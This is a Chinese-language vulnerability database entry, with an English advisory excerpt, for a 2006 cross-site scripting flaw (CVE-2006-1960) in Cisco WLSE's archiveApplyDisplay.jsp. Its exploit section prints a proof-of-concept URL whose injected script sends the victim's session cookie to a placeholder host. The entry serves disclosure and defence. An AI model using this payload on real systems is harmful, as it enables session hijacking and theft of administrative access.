Cisco WLSE archiveApplyDisplay.jsp跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110099 漏洞类型 跨站脚本
发布时间 2006-04-19 更新时间 2006-04-25
CVE编号 CVE-2006-1960 CNNVD-ID CNNVD-200604-405
漏洞平台 JSP CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/27684
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-405
|漏洞详情
CiscoWorksWLSE是集中的系统级应用程序,用于管理和控制整个自治CiscoWLAN基础架构。CiscoWorksWLSE配置管理脚本的实现上存在漏洞,攻击者可能利用此漏洞获取敏感信息。WLSE设备中/wlse/configure/archive/archiveApplyDisplay.jsp的"displayMsg"参数可导致跨站脚本漏洞。攻击者可以利用这个漏洞窃取JSP会话cookie,然后结合其他漏洞获得对系统的管理级访问。
|漏洞EXP
source: http://www.securityfocus.com/bid/17604/info

CiscoWorks Wireless LAN Solution Engine (WLSE) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal JSP session cookie-based authentication credentials and launch other attacks.

http://www.example.com/wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http://www.example2.com?'+document.cookie</script>
|参考资料

来源:VUPEN
名称:ADV-2006-1434
链接:http://www.frsirt.com/english/advisories/2006/1434
来源:CISCO
名称:20060419MultipleVulnerabilitiesintheWLSEAppliance
链接:http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
来源:SECTRACK
名称:1015965
链接:http://securitytracker.com/id?1015965
来源:SECUNIA
名称:19736
链接:http://secunia.com/advisories/19736
来源:XF
名称:cisco-wlse-user-xss(25883)
链接:http://xforce.iss.net/xforce/xfdb/25883
来源:BID
名称:17604
链接:http://www.securityfocus.com/bid/17604
来源:BUGTRAQ
名称:20060419MultiplevulnerabilitiesinLinuxbasedCiscoproducts
链接:http://www.securityfocus.com/archive/1/archive/1/431371/30/5490/threaded
来源:BUGTRAQ
名称:20060419Re:MultiplevulnerabilitiesinLinuxbasedCiscoproducts
链接:http://www.securityfocus.com/archive/1/archive/1/431367/30/5490/threaded
来源:OSVDB
名称:24812
链接:http://www.osvdb.org/24812
来源:MISC
链接:http://www.assurance.com.au/advisories/200604-cisco.txt